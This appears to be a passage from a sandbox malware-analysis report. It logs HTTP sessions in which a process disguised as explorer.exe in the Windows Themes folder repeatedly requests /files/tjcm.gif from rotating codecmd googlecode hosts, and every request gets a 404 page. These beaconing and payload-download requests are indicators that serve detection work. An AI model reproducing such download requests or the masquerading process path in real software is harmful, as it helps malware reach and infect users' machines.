                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:25.490885019 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.549745108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:26.594480991 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:27.462222099 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:27 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:27.462249041 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:14:27.462263107 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      33192.168.2.54974674.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:28.343350887 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:29.047945976 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:28 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:29.047985077 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.549747108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:30.003246069 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:30.705008984 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:30 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:30.705131054 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.549749108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:31.955224991 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:32.624856949 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:32 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:32.625170946 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.54975074.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:34.072392941 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:34.769649982 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:34 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:34.769675016 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.549751108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:35.476939917 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:36.407799006 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:36 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:36.407824993 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:14:36.408168077 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
